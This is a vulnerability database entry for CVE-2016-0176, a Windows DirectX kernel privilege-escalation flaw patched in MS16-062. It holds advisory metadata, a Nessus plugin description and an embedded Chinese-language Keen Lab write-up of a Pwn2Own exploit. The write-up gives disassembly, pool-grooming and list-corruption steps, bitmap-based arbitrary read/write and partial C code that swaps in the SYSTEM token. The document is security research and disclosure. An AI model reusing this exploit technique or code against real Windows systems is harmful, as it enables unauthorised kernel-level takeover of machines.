Vulnerabilities > CVE-2016-0176 - Permissions, Privileges, and Access Controls vulnerability in Microsoft products
Attack vector
LOCAL Attack complexity
LOW Privileges required
LOW Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
dxgkrnl.sys in the DirectX Graphics kernel subsystem in the kernel-mode drivers in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "Microsoft DirectX Graphics Kernel Subsystem Elevation of Privilege Vulnerability."
Vulnerable Configurations
Part | Description | Count |
OS | 8 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Accessing, Modifying or Executing Executable Files An attack of this type exploits a system's configuration that allows an attacker to either directly access an executable file, for example through shell access; or in a possible worst case allows an attacker to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.
- Leverage Executable Code in Non-Executable Files An attack of this type exploits a system's trust in configuration and resource files, when the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high. The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser. Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf ( http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process. The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name "public" grants all users with the public role the ability to use the administration functionality. The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.
- Blue Boxing This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.
- Restful Privilege Elevation Rest uses standard HTTP (Get, Put, Delete) style permissions methods, but these are not necessarily correlated generally with back end programs. Strict interpretation of HTTP get methods means that these HTTP Get services should not be used to delete information on the server, but there is no access control mechanism to back up this logic. This means that unless the services are properly ACL'd and the application's service implementation are following these guidelines then an HTTP request can easily execute a delete or update on the server side. The attacker identifies a HTTP Get URL such as http://victimsite/updateOrder, which calls out to a program to update orders on a database or other resource. The URL is not idempotent so the request can be submitted multiple times by the attacker, additionally, the attacker may be able to exploit the URL published as a Get method that actually performs updates (instead of merely retrieving data). This may result in malicious or inadvertent altering of data on the server.
- Target Programs with Elevated Privileges This attack targets programs running with elevated privileges. The attacker would try to leverage a bug in the running program and get arbitrary code to execute with elevated privileges. For instance an attacker would look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break. The malicious user try to execute its code at the same level as a privileged system call.
bulletin_id | MS16-062 |
bulletin_url | |
date | 2016-05-10T00:00:00 |
impact | Elevation of Privilege |
knowledgebase_id | 3158222 |
knowledgebase_url | |
severity | Important |
title | Security Update for Windows Kernel-Mode Drivers |
NASL family | Windows : Microsoft Bulletins |
NASL id | SMB_NT_MS16-062.NASL |
description | The remote Windows host is missing a security update. It is, therefore, affected by multiple vulnerabilities : - Multiple privilege escalation vulnerabilities exist in the Windows kernel-mode driver due to a failure to properly handle objects in memory. An authenticated, remote attacker can exploit this, via a crafted application, to execute arbitrary code. (CVE-2016-0171, CVE-2016-0173, CVE-2016-0174, CVE-2016-0196) - A security feature bypass vulnerability exists in the Windows kernel. An authenticated, remote attacker can exploit this, via a crafted application, to bypass the Kernel Address Space Layout Randomization (KASLR) feature and retrieve the memory address of a kernel object. (CVE-2016-0175) - A privilege escalation vulnerability exists in the DirectX Graphics kernel subsystem due to a failure to properly handle objects in memory. An authenticated, remote attacker can exploit this, via a crafted application, to execute arbitrary code. (CVE-2016-0176) - A privilege escalation vulnerability exists in the DirectX Graphics kernel subsystem due to a failure to correctly map kernel memory and to handle objects in memory. An authenticated, remote attacker can exploit this, via a crafted application, to execute arbitrary code. (CVE-2016-0197) |
last seen | 2020-06-01 |
modified | 2020-06-02 |
plugin id | 91012 |
published | 2016-05-10 |
reporter | This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. |
source | |
title | MS16-062: Security Update for Windows Kernel-Mode Drivers (3158222) |
code |
bulletinFamily | exploit |
description | 来源: [腾讯科恩实验室官方博客]( 作者: **Daniel King (@long123king)** ### 如何攻破微软的Edge浏览器 攻破微软的Edge浏览器至少需要包含两方面基本要素:浏览器层面的远程代码执行(RCE: Remote Code Execution)和浏览器沙箱绕过。 浏览器层面的远程代码执行通常通过利用Javascript脚本的漏洞完成,而浏览器的沙箱绕过则可以有多种方式,比如用户态的逻辑漏洞,以及通过内核漏洞达到本地提权(EoP: Escalation of Privilege)。 微软Edge浏览器使用的沙箱是建立在Windows操作系统的权限检查机制之上的。在Windows操作系统中,资源是可以在全系统范围内被共享的,比如一个文件或者设备可以在不同进程间被共享。由于有些资源里面包含着敏感信息,而另外一些资源的完整性则关乎系统的正常运转,如果被破坏了就会导致整个系统的崩溃。因此当一个进程在访问资源时需要进行严格的权限检查。当一个资源被打开时,主调进程的令牌信息会与目标资源的安全描述符信息进行匹配检查。权限检查由几个不同层面的子检查组成:属主身份及组身份检查,特权检查,完整性级别及可信级别检查,Capability检查等等。上一代的沙箱是基于完整性级别机制的,在沙箱里面运行的应用程序处于Low完整性级别,因此无法访问处于Medium或者更高级别的资源。微软的Edge浏览器采用的是最新一代的沙箱机制,这代沙箱是基于AppContainer的,运行在沙箱里的应用程序依然处于Low完整性级别,当它们尝试访问资源时,除了进行完整性级别检查,还需要进行Capabilities的检查,这种检查更加细腻以及个性化。关于权限检查机制的更多细节,可以参考我在ZeroNights 2015上的演讲:[Did You Get Your Token?]( 沙箱绕过的最常用的方法是通过内核态的漏洞利用,直接操作内核对象(DKOM: Direct Kernel Object Manipulation)以达到本地提权。 ### [](#CVE-2016-0176 "CVE-2016-0176")CVE-2016-0176 这个漏洞是位于dxgkrnl.sys驱动中,是一个内核堆溢出漏洞。 被篡改的数据结构定义如下: ```c typedef struct _D3DKMT_PRESENTHISTORYTOKEN { D3DKMT_PRESENT_MODEL Model; //D3DKMT_PM_REDIRECTED_FLIP = 2, UINT TokenSize; // 0x438 UINT64 CompositionBindingId; union { D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN Flip; D3DKMT_BLTMODEL_PRESENTHISTORYTOKEN Blt; D3DKMT_VISTABLTMODEL_PRESENTHISTORYTOKEN VistaBlt; D3DKMT_GDIMODEL_PRESENTHISTORYTOKEN Gdi; D3DKMT_FENCE_PRESENTHISTORYTOKEN Fence; D3DKMT_GDIMODEL_SYSMEM_PRESENTHISTORYTOKEN GdiSysMem; D3DKMT_COMPOSITION_PRESENTHISTORYTOKEN Composition; } Token; } D3DKMT_PRESENTHISTORYTOKEN; ``` 我们把这个数据结构简称为”history token”,想要激发这个漏洞需要将关键成员变量按如下定义: * **Model**要设置为**D3DKMT_PM_REDIRECTED_FLIP**; * **TokenSize**要设置为**0x438**; 你大概已经猜到漏洞是存在在**Token.Flip**成员里面,该成员类型定义如下: ```c typedef struct _D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN { UINT64 FenceValue; ULONG64 hLogicalSurface; UINT_PTR dxgContext; D3DDDI_VIDEO_PRESENT_SOURCE_ID VidPnSourceId; …… D3DKMT_DIRTYREGIONS DirtyRegions; } D3DKMT_FLIPMODEL_PRESENTHISTORYTOKEN; ``` 继续深入到**DirtyRegions**的类型定义: ```c typedef struct tagRECT { LONG left; LONG top; LONG right; LONG bottom; } RECT, *PRECT, NEAR *NPRECT, FAR *LPRECT; // 0x10 bytes typedef struct _D3DKMT_DIRTYREGIONS { UINT NumRects; RECT Rects[D3DKMT_MAX_PRESENT_HISTORY_RECTS]; // 0x10 * 0x10 = 0x100 bytes //#define D3DKMT_MAX_PRESENT_HISTORY_RECTS 16 } D3DKMT_DIRTYREGIONS; ``` 现在我们已经到达了最基本类型的定义, 看到一个成员是DWORD类型的**NumRects**, 另外一个是数组**RECT**,其中每个元素的类型是**Rects**, 这个数组是定长的,有16个元素的空间,每个元素0x10字节,每个这个数组的总长度是0x100字节。  上图展示了被篡改的数据结构的布局以及它们之间的关系,左面一栏是我们在调用 Win32 API 函数**D3DKMTPresent**时从用户态传入的数据结构,中间一栏是dxgkrnl.sys驱动接收到并维护的对应的数据结构,它是从左面一栏的数据结构中拷贝出来的,而右面一栏是内嵌定义在history token中的成员**Token.Flip**的数据结构。我们知道一个union的大小是由其成员中最大的成员大小决定的,而在这里**Token.Flip**恰好是union**Token**中最大的一个成员,也就是说整个history token数据结构是由**Token.Flip**中的内容填满直到结尾,这个特征非常重要,大大简化了利用的复杂度。 有了上面关于数据结构的知识,我们就可以很方便地理解这个漏洞了,现在展示的是引起漏洞的汇编代码片断: ``` loc_1C009832A: DXGCONTEXT::SubmitPresentHistoryToken(......) + 0x67B cmp dword ptr[r15 + 334h], 10h // NumRects jbe short loc_1C009834B; Jump if Below or Equal(CF = 1 | ZF = 1) call cs : __imp_WdLogNewEntry5_WdAssertion mov rcx, rax mov qword ptr[rax + 18h], 38h call cs : __imp_WdLogEvent5_WdAssertion loc_1C009834B: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6B2 mov eax, [r15 + 334h] shl eax, 4 add eax, 338h jmp short loc_1C00983BD loc_1C00983BD: DXGCONTEXT::SubmitPresentHistoryToken (......) + 0x6A5 lea r8d, [rax + 7] mov rdx, r15; Src mov eax, 0FFFFFFF8h; mov rcx, rsi; Dst and r8, rax; Size call memmove ``` 在这片代码的入口处,r15寄存器指向的是history token结构的内存区域。代码首先从内存区域的0x334偏移处取出一个DWORD,并与0x10进行比较,通过上图我们可以看到取出的DWORD正是**Token.Flip.NumRects**成员,而0x10则是内嵌数组**Token.Flip.Rects**容量,所以这里比较的是**Token.Flip.NumRects**的值是否超出了**Token.Flip.Rects**数组的容量。如果你是在代码审查时遇到了这段代码,那么你可能会自言自语道大事不妙,微软已经意识到了这个潜在的溢出,并做了比较严格的检查。硬着头皮往下看,当溢出发生时,代码会以assertion的方式将这个异常情况记录到watch dog驱动,但是这个比对后的产生的两个代码分枝最终又都在loc\_1C009834B处会合。可能你会想watch dog驱动有机会对代码溢出情况做出反应,通过bug check主动蓝屏(BSOD),然而事实上什么都没有发生。 不管你对**Token.Flip.NumRects**这个变量设置什么值,代码都会最终执行到loc\_1C009834B处的代码块,这个代码块对**Token.Flip.NumRects**值做了一些基础的算术运算,并且用运算的结果指定memcpy操作拷贝的长度。 为了更加直观地说明问题,把汇编代码改写成对应的C++代码: ```c D3DKMT_PRESENTHISTORYTOKEN* hist_token_src = BufferPassedFromUserMode(…); D3DKMT_PRESENTHISTORYTOKEN* hist_token_dst = ExpInterlockedPopEntrySList(…); if(hist_token_src->dirty_regions.NumRects > 0x10) { // log via watch dog assertion, NOT work in free/release build } auto size = (hist_token_src->dirty_regions.NumRects * 0x10 + 0x338 + 7) / 8; auto src = (uint8_t*)hist_token_src; auto dst = (uint8_t*)hist_token_dst; memcpy(dst, src, size); ``` 事情更加简单明了,无论我们给**Token.Flip.NumRects**指定什么样的值,一个内存拷贝操作在所难免,拷贝操作的源数据正是我们通过调用Win32 API **D3DKMTPresent**从用户态传入的buffer,拷贝操作的目标是通过调用**ExpInterlockedPopEntrySList**从内核堆上分配的buffer,而拷贝操作的长度是通过计算拥有**Token.Flip.NumRects**个元素的数组的长度,再加上数组成员在history token结构体中的偏移,以及因为对齐产生的padding长度。如果我们为**Token.Flip.NumRects**指定了一个大于0x10的长度,那么内核堆溢出就发生了,我们可以控制溢出的长度,以及溢出的前0x38字节内容(如上面介绍数据结构布局的图所示,在从用户态传入的数据中,我们可以控制history token结构后面的0x38字节数据)。 这个漏洞非常有意思,因为微软已经预见了它的存在却没能阻止它的发生,我们可以从中得到的教训是不要滥用编程技巧,除非你知道你自己在干什么,比如assertion机制。 ### [](#利用 "利用")利用 对于一个堆利用来说,了解目标内存区域附近的内存布局至关重要,我们已经知道目标内存是通过**ExpInterlockedPopEntrySList**函数在内核态内存池中分配的。 通过简单调试,我们可以得到如下内存池信息: ``` kd> u rip-6 L2 dxgkrnl!DXGCONTEXT::SubmitPresentHistoryToken+0x47b: fffff801`cedb80fb call qword ptr [dxgkrnl!_imp_ExpInterlockedPopEntrySList (fffff801`ced77338)] fffff801`cedb8101 test rax,rax kd> !pool rax Pool page ffffc0012764c5a0 region is Paged pool *ffffc0012764b000 : large page allocation, tag is DxgK, size is 0x2290 bytes Pooltag DxgK : Vista display driver support, Binary : dxgkrnl.sys ``` 这是一个比较大的内存区域,大小为0x2290字节,因为这个大小已经超过了一个内存页的长度(一个内存页是0x1000字节),所以它是以大页内存(Large Page Allocation)分配的,三个连续内存页被用来响应这次大页内存分配申请,为了节约内存,在0x2290之后的多余空间被回收并且链接到了Paged Pool的free list上面,供后续的小内存分配使用。在0x2290之后,会插入一个起到分隔作用的标记为Frag的内存分配。关于内核内存池及大页分配的详情,参考Tarjei Mandt的白皮书:[Kernel Pool Exploitation on Windows 7](。下面展示的是在0x2290偏移附近的内存内容: ``` kd> db ffffc0012764b000+0x2290 L40 ffffc001`2764d290 00 01 02 03 46 72 61 67-00 00 00 00 00 00 00 00 ....Frag........ ffffc001`2764d2a0 90 22 00 00 00 00 00 00-00 00 00 00 00 00 00 00 .".............. ffffc001`2764d2b0 02 01 01 00 46 72 65 65-0b 43 44 9e f1 81 a8 47 ....Free.CD....G ffffc001`2764d2c0 01 01 04 03 4e 74 46 73-c0 32 42 3a 00 e0 ff ff ....NtFs.2B:.... ``` 驱动dxgkrnl.sys中的**DXGPRESENTHISTORYTOKENQUEUE::GrowPresentHistoryBuffer**函数用来分配并管理一个链接history token的单链表。每个history token的长度是0x438字节,加上内存池分配的头部及padding一共0x450字节,所以0x2290大小的内存被平均分成8个history token,并且以倒序的方式链接在单链表中。驱动dxgkrnl.sys意图将单链表以look-aside list的方式来响应单个history token的内存分配请求。 单链表初始状态时如下所示:  单链表在响应过一个history token分配请求后如下所示:  单链表在响应过两个history token分配请求后如下所示:  明确了溢出的目标内存处的内存布局,我们得到两种溢出方案: #### [](#方案1:溢出0x2290偏移后面的复用的小内存分配空间 "方案1:溢出0x2290偏移后面的复用的小内存分配空间:")方案1:溢出0x2290偏移后面的复用的小内存分配空间:  #### [](#方案2:溢出相邻的单链表头部,转化成单链表利用 "方案2:溢出相邻的单链表头部,转化成单链表利用:")方案2:溢出相邻的单链表头部,转化成单链表利用:  方案1有诸多限制,因为我们只能控制溢出的前0x38字节内容,这意味着减掉padding空间,用于分隔的frag内存池分配项目的长度以及接下来的内存池分配的头部,我们没有多余发挥的空间。 方案2看起来很可行,虽然我们知道Windows内核现在已经强制对双链表进行完整性检查,但是对于单链表没有任何检查,因此我们可以通过覆盖单链表中的next指针达到重定向读写的目标。 为了进一步验证可行性,我们先在头脑里演绎一下方案2的种种可能。上面的几张图已经展示了从单链表中弹出两个history token的情形,此时我们可以溢出节点B,让它覆盖节点A的头部,然后我们将节点B压回单链表:  当我们把节点A也压回单链表时,接下来会怎样,会不会如我们所料将单链表的读写重定向到被溢出覆盖的next指针处  很遗憾并非如我们所料,这种重定向读写不会发生,因为当我们将节点A压回单链表时,覆盖的QWORD会恢复成指向节点B的指针:  我们回到已经弹出两个节点的状态再尝试另外一种可能:  这次我们先将节点A压回单链表:  然后我们溢出节点B,以覆盖节点A的头部,因为此时节点A已经被回收进单链表,所以不会再有任何操作可以将子节点A的头部恢复了。现在单链表已经被破坏了,它的第二个元素已经指向了溢出覆盖的QWORD所指向的内存处。:  经过了上面的演绎,我们对方案2信心十足,现在我们就开始动手吧!看起来我们必须对单链表乱序调用push和pop,至少要有两次连续的pop,我做了如下的尝试: #### [](#尝试1:循环调用D3DKMTPresent并传入可导致溢出的buffer。 "尝试1:循环调用D3DKMTPresent并传入可导致溢出的buffer。")尝试1:循环调用D3DKMTPresent并传入可导致溢出的buffer。 结果失败了,经过调试发现每次都在重复pop节点A,使用后push节点A这个循环,根本不会产生乱序。原因很简单,循环调用D3DKMTPresent被逐个响应,所以我们必须同时调用它才能产生乱序。 #### [](#尝试2:在多线程中循环调用D3DKMTPresent并传入可导致溢出的buffer。 "尝试2:在多线程中循环调用D3DKMTPresent并传入可导致溢出的buffer。")尝试2:在多线程中循环调用D3DKMTPresent并传入可导致溢出的buffer。 结果又失败了,经过一些简单的逆向分析,D3DKMTPresent的调用路径应该是被加锁保护了。 经历了两次挫败,不免开始怀疑人生,是否会出现两次连续的pop呢?然后很快就意识到绝对可行,肯定是我姿势不对,否则这相对复杂的单链表就退化成单个变量了,肯定有其他的内核调用路径可以激发单链表pop操作。我编写了一个windbg脚本记录每次push和pop操作,然后尝试打开一些图形操作密集的应用程序,只要发现了两次连续的pop就证明发现了第二条路径。经过简单的尝试,奇迹出现了,当我打开Solitaire游戏时,两次pop出现了,经过简单的调试,发现**BitBlt** API会触发第二条pop的内核路径。 #### [](#尝试3:在多线程中循环调用D3DKMTPresent并传入可导致溢出的buffer,同时在另外一批多线程中循环调用BitBlt。 "尝试3:在多线程中循环调用D3DKMTPresent并传入可导致溢出的buffer,同时在另外一批多线程中循环调用BitBlt。")尝试3:在多线程中循环调用D3DKMTPresent并传入可导致溢出的buffer,同时在另外一批多线程中循环调用BitBlt。 这一次终于成功地将单链表中的next指针重定向到指定位置,达到了内核态任意地址写的目的。但是这种写的能力有限,很难重复,而我们想要通过DKOM方式偷换令牌需要多次内核读写,而这种矛盾在Pwn2Own 2016的3次尝试总时间15分钟的严苛比赛规则下显得更加突出,我们需要一些其他技巧。 ### [](#其他技巧 "其他技巧")其他技巧 #### [](#如何达到可重复的内核态任意地址读写 "如何达到可重复的内核态任意地址读写")如何达到可重复的内核态任意地址读写 为了达到这个目标,我使用win32k的位图bitmap对象作为中间目标。首先向内核态内存中spray大量的bitmap对象,然后猜测它们的位置,并试图通过上面的重定向写技巧修改它们的头部,当我成功地命中第一个bitmap对象后,通过修改它的头部中的buffer指针和长度,让其指向第二个bitmap对象。因此总共需要控制两个bitmap对象,第一个用来控制读写的地址,而第二个用来控制读写的内容。 再详细地讲,我一共向内核内存中spray了4GB的bitmap对象,首先通过喷射大尺寸的256MB的bitmap对象来锁定空间以及引导内存对齐,然后将它们逐个替换成1MB的小尺寸bitmap对象,这些对象肯定位于0x100000的边界处,就使得猜测它们的地址更加简单。 在猜测bitmap对象地址的过程中需要信息泄露来加快猜测速度,这是通过**user32! gSharedInfo**完成的。 #### [](#偷换令牌 "偷换令牌")偷换令牌 有了可重复地任意地址读写的能力后,再加上通过sidt泄露内核模块的地址,我们可以方便地定位到**nt!PspCidTable**指向的句柄表,然后从中找出当前进程以及system进程对应的_EPROCESS结构体,进而找到各自的_TOKEN结构的地址,从而完成替换。 #### 部分利用代码 ```c VOID ThPresent(THREAD_HOST * th) { SIZE_T hint = 0; while (TRUE) { HIST_TOKEN ht = { 0, }; HtInitialize(&ht); SIZE_T victim_surf_obj = ThNextGuessedAddr(th, ++hint); SIZE_T buffer_ptr = victim_surf_obj + 0x200000 + 0x18; th->backupBufferPtr1 = victim_surf_obj + 0x258; th->backupBufferPtr2 = victim_surf_obj + 0x200000 + 0x258; SIZE_T back_offset = 0x10; SURFOBJ surf_obj = { 0, }; surf_obj.cjBits = 0x80; surf_obj.pvBits = (PVOID)buffer_ptr; surf_obj.pvScan0 = (PVOID)buffer_ptr; = 0x04; = 0x08; surf_obj.iBitmapFormat = 0x06; surf_obj.iType = 0; surf_obj.fjBitmap = 0x01; surf_obj.lDelta = 0x10; DWORD dwBuff = 0x04800200; HtSetBuffer(&ht, 0x18 + th->memberOffset - back_offset, (unsigned char*)&surf_obj, 0x68); HtSetBuffer(&ht, 0x70 + th->memberOffset - back_offset, &dwBuff, sizeof(DWORD)); if (th->memberOffset - back_offset + 0xE8 < 0x448) { SIZE_T qwBuff = victim_surf_obj + 0xE0; HtSetBuffer(&ht, 0xE0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T)); HtSetBuffer(&ht, 0xE8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T)); } if (th->memberOffset - back_offset + 0x1C0 < 0x448) { SIZE_T qwBuff = victim_surf_obj + 0x1B8; HtSetBuffer(&ht, 0x1B8 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T)); HtSetBuffer(&ht, 0x1C0 + th->memberOffset - back_offset, &qwBuff, sizeof(SIZE_T)); } HtOverflowNextSListEntry(&ht, victim_surf_obj); HtTrigger(&ht); if (th->triggered) break; } } VOID ThTrigger(THREAD_HOST * th) { SIZE_T i = 0; HANDLE threads[TH_MAX_THREADS] = { 0, }; unsigned char second_buffer[0x78] = { 0, }; for (SIZE_T i = 0; i < TH_MAX_THREADS; i++) { if (th->triggered) { break; } if (i == 9) { DWORD thread_id = 0; threads[i] = CreateThread(NULL, 0, ProbeThreadProc, th, 0, &thread_id); } else if (i % 3 != 0 && i > 0x10) { DWORD thread_id = 0; threads[i] = CreateThread(NULL, 0, PresentThreadProc, th, 0, &thread_id); } else { DWORD thread_id = 0; threads[i] = CreateThread(NULL, 0, BitbltThreadProc, th, 0, &thread_id); } } for (i = 0; i < TH_MAX_THREADS; i++) { if (threads[i] != NULL) { if (WAIT_OBJECT_0 == WaitForSingleObject(threads[i], INFINITE)) { CloseHandle(threads[i]); threads[i] = NULL; } } } Log("trigged\n"); ThRead(th, (const void*)th->backupBufferPtr2, second_buffer, 0x78); ADDR_RESOLVER ar = { 0, }; ArInitialize(&ar, th); SIZE_T nt_addr = ArNTBase(&ar); SIZE_T psp_cid_table_addr = nt_addr + PSP_CIDTABLE_OFFSET; SIZE_T psp_cid_table_value; ThRead(th, psp_cid_table_addr, &psp_cid_table_value, 0x08); SIZE_T psp_cid_table[0x0C] = { 0, }; ThRead(th, psp_cid_table_value, psp_cid_table, 0x60); SIZE_T table_code = psp_cid_table[1]; SIZE_T handle_count = psp_cid_table[0x0B] & 0x00000000ffffffff; SIZE_T curr_pid = GetCurrentProcessId(); do { ThParseCidTable(th, table_code, handle_count); Sleep(1000); } while (th->currentEprocess == NULL || th->systemEprocess == NULL); SIZE_T curr_proc = th->currentEprocess; SIZE_T system_proc = th->systemEprocess; SIZE_T system_token = 0; ThRead(th, (system_proc + 0x358), &system_token, 0x08); SIZE_T curr_token = 0; ThRead(th, (curr_proc + 0x358), &curr_token, 0x08); ThWrite(th, (curr_proc + 0x358), &system_token, 0x08); ThRead(th, (curr_proc + 0x358), &curr_token, 0x08); ThRestore(th); Log("elevated\n"); Sleep(3600000); return; } ``` ### 参考: 1. [Rainbow Over the Windows]( 2. [Did You Get Your Token?]( 3. [Windows Kernel Exploitation : This Time Font hunt you down in 4 bytes]( 4. [Kernel Pool Exploitation on Windows 7]( |
id | SSV:92544 |
last seen | 2017-11-19 |
modified | 2016-11-19 |
published | 2016-11-19 |
reporter | Root |
title | The Microsoft DirectX graphics kernel subsystem elevation of privilege vulnerability MS16-062) |